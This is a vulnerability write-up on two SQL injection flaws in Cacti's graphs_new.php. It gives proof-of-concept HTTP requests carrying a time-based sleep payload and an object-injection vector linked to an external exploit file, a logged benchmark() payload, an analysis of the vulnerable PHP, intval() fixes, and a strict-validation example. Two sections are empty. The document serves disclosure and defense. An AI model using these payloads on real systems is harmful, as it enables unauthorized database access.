catalogue

1. Vulnerability Description
2. Trigger Conditions
3. Affected Scope
4. Code Analysis
5. Mitigation
6. Offense and Defense Reflections

1. Vulnerability Description

Another SQL injection vulnerability via graphs_new.php in Cacti was found and reported as bug http://bugs.cacti.net/view.php?id=2652.

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. Trigger Conditions

0x1: POC1: SQL Injection

POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.217.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Injection

1. Login
2. POST http://target/cacti/graphs_new.php

Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=1&host_id=1&selected_graphs_array=[injection]

{Injection exp can be found on my server: http://pandas.pw/cacti.exp}

3. mysql log: select graph_template_id from snmp_query_graph where id=1 and benchmark(20000000,sha1(1))--

3. Affected Scope

4. Code Analysis

0x1: Vuln-1: Object Injection to SQL Injection

/graphs_new.php

/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

switch ($_REQUEST["action"]) {
    case 'save':
        // track function form_save
        form_save();
        break;
    case 'query_reload':
        host_reload_query();
        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
        break;
    default:
        include_once("./include/top_header.php");
        graphs();
        include_once("./include/bottom_footer.php");
        break;
}

form_save();

function form_save()
{
    ..
    if (isset($_POST["save_component_new_graphs"])) {
        // Track function host_new_graphs_save()
        host_new_graphs_save();
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

host_new_graphs_save();

function host_new_graphs_save()
{
    // $selected_graphs_array is simply the unserialized POST variable, which we control and which is not filtered.
    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
    ..
    // The variable is then copied into a three-dimensional array, and finally the attacker-controlled
    // value is concatenated into the SELECT query, which causes the SQL injection.
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
    ..
}

0x2: Vuln-2: SQL Injection

function form_save()
{
    if (isset($_POST["save_component_graph"])) {
        /* summarize the 'create graph from host template/snmp index' stuff into an array */
        while (list($var, $val) = each($_POST)) {
            if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
            }
            // cg_g is not filtered
            elseif (preg_match('/^cg_g$/', $var)) {
                if ($_POST["cg_g"] > 0) {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                }
            }
            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        }

        if (isset($selected_graphs)) {
            // the external input parameters are passed into host_new_graphs()
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }

    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
       fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "
";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                // sql injection in graph_template_id
                $graph_template_id = $form_id1;

                html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
                ..
            }
            ..
        }
    }
    ..
}

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. Mitigation

/graphs_new.php

function host_new_graphs_save()
{
    ..
    /* $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]); */
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
    ..
}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
       fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "
";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                // sql injection in graph_template_id
                $graph_template_id = $form_id1;
                /**/ $graph_template_id = intval($graph_template_id); /**/
                html_start_box("Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");
                ..
            }
            ..
        }
    }
    ..
}

Relevant Link:

http://www.cacti.net/download_cacti.php
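The two points the analysis above turns on, the unfiltered cg_g branch in form_save() (POC1) and the intval() cast in the fix, rebuilt as an added example that is not Cacti's code. original_cg_g_check(), is_graph_id(), collect_graph_template_ids() and graph_template_name_query() are hypothetical names; the cg_g value is the URL-decoded POC1 body from section 2.

```php
<?php
// Added example, not Cacti's code: the cg_* / cg_g handling of form_save()
// rebuilt with strict validation. All function names below are hypothetical.

// POC1's cg_g value from the page (URL-decoded), used as constructed sample input.
const POC1_CG_G = '033926697 xor (select(0)from(select sleep(5))v)';

// The original guard is a loose comparison. PHP 7 takes the leading digits and
// compares 33926697 > 0; PHP 8 compares the non-numeric string with "0" as
// strings. Both accept the payload, which then becomes an array key.
function original_cg_g_check($value): bool {
    return $value > 0;
}

// Strict replacement: only a plain positive decimal string counts as an id.
function is_graph_id($value): bool {
    return is_string($value) && ctype_digit($value) && (int)$value > 0;
}

// Rebuild the "cg" selection as integers; anything else aborts the request
// instead of reaching the interpolated SELECT in host_new_graphs().
function collect_graph_template_ids(array $post): array {
    $ids = array();
    foreach ($post as $var => $val) {
        if (preg_match('/^cg_(\d+)$/', $var, $m)) {
            $ids[] = (int)$m[1];
        } elseif ($var === 'cg_g') {
            if (!is_graph_id($val)) {
                throw new InvalidArgumentException("cg_g is not a positive integer id");
            }
            $ids[] = (int)$val;
        }
    }
    return array_values(array_unique($ids));
}

// With an int parameter the interpolation cannot carry SQL; this is what the
// intval() in the fix achieves, enforced here by the type instead of a cast.
function graph_template_name_query(int $graph_template_id): string {
    return "select name from graph_templates where id=$graph_template_id";
}

var_dump(original_cg_g_check(POC1_CG_G));   // the original guard accepts the payload
try {
    collect_graph_template_ids(array('cg_g' => POC1_CG_G, 'host_id' => '2'));
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";   // the strict version refuses it
}
foreach (collect_graph_template_ids(array('cg_5' => 'on', 'cg_g' => '12')) as $id) {
    echo graph_template_name_query($id), "\n";   // legitimate ids still build queries
}
```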

6. Offense and Defense Reflections

Copyright (c) 2016 Little5ann All rights reserved
